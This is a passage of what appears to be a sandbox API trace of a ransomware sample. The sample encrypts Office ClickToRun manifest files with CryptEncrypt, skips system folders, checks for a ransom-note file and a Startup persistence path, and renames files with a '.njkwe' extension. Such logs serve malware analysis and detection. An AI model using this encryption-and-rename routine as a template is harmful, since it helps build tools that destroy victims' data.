lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.521] CloseHandle (hObject=0x434) returned 1 [0070.521] GetProcessHeap () returned 0xbe0000 [0070.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.521] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 143 [0070.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.521] GetProcessHeap () returned 0xbe0000 [0070.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.521] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2a3e81, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed2a3e81, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3678904, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b28, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.osmmui.msi.16.en-us.xml", cAlternateFileName="C25F09~1.XML")) returned 1 [0070.521] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.521] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.521] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.521] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.521] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.522] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml") returned 114 [0070.522] StrStrIW (lpFirst="C2RManifest.osmmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.522] lstrcmpW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.522] lstrcmpW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.522] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.522] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.522] GetTickCount () returned 0x1152007 [0070.522] GetTickCount () returned 0x1152007 [0070.522] GetTickCount () returned 0x1152007 [0070.522] GetTickCount () returned 0x1152007 [0070.522] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.522] GetProcessHeap () returned 0xbe0000 [0070.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.522] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.562] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.562] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.562] GetProcessHeap () returned 0xbe0000 [0070.562] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.562] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.562] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.562] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.562] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.562] CloseHandle (hObject=0x434) returned 1 [0070.562] GetProcessHeap () returned 0xbe0000 [0070.562] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.562] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 134 [0070.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.563] GetProcessHeap () returned 0xbe0000 [0070.563] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.563] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed25796c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed25796c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd28c2fa3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x906, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", cAlternateFileName="C22C6F~1.XML")) returned 1 [0070.563] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.563] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.563] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.563] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.563] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.563] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned 127 [0070.563] StrStrIW (lpFirst="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.563] lstrcmpW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.563] lstrcmpW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.563] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-no", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.563] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.564] GetTickCount () returned 0x1152036 [0070.564] GetTickCount () returned 0x1152036 [0070.564] GetTickCount () returned 0x1152036 [0070.564] GetTickCount () returned 0x1152036 [0070.564] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.564] GetProcessHeap () returned 0xbe0000 [0070.564] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.564] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x906, lpOverlapped=0x0) returned 1 [0070.566] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff6fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.566] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x906, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x906, lpOverlapped=0x0) returned 1 [0070.566] GetProcessHeap () returned 0xbe0000 [0070.566] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.566] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.566] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.566] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.566] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.566] CloseHandle (hObject=0x434) returned 1 [0070.566] GetProcessHeap () returned 0xbe0000 [0070.566] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.566] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 147 [0070.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.567] GetProcessHeap () returned 0xbe0000 [0070.567] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.567] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed25796c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed25796c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd362c40f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.osmuxmui.msi.16.en-us.xml", cAlternateFileName="C21C45~1.XML")) returned 1 [0070.567] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.567] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.567] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.567] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.567] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.567] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml") returned 116 [0070.567] StrStrIW (lpFirst="C2RManifest.osmuxmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.567] lstrcmpW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.567] lstrcmpW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.567] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.567] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.568] GetTickCount () returned 0x1152036 [0070.568] GetTickCount () returned 0x1152036 [0070.568] GetTickCount () returned 0x1152036 [0070.568] GetTickCount () returned 0x1152036 [0070.568] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.568] GetProcessHeap () returned 0xbe0000 [0070.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.568] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.570] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.570] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.570] GetProcessHeap () returned 0xbe0000 [0070.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.570] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.570] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.570] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.570] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.571] CloseHandle (hObject=0x434) returned 1 [0070.571] GetProcessHeap () returned 0xbe0000 [0070.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.571] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 136 [0070.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.571] GetProcessHeap () returned 0xbe0000 [0070.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.571] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed25796c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed25796c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd276bb03, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17194, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", cAlternateFileName="C29151~1.XML")) returned 1 [0070.571] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.571] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.571] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.572] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.572] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.572] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned 131 [0070.572] StrStrIW (lpFirst="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.572] lstrcmpW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.572] lstrcmpW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.572] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.572] GetTickCount () returned 0x1152036 [0070.572] GetTickCount () returned 0x1152036 [0070.572] GetTickCount () returned 0x1152036 [0070.572] GetTickCount () returned 0x1152036 [0070.572] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.572] GetProcessHeap () returned 0xbe0000 [0070.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.572] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.574] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.574] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.574] GetProcessHeap () returned 0xbe0000 [0070.575] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.575] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.575] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.575] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.575] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.575] CloseHandle (hObject=0x434) returned 1 [0070.575] GetProcessHeap () returned 0xbe0000 [0070.575] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.575] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 151 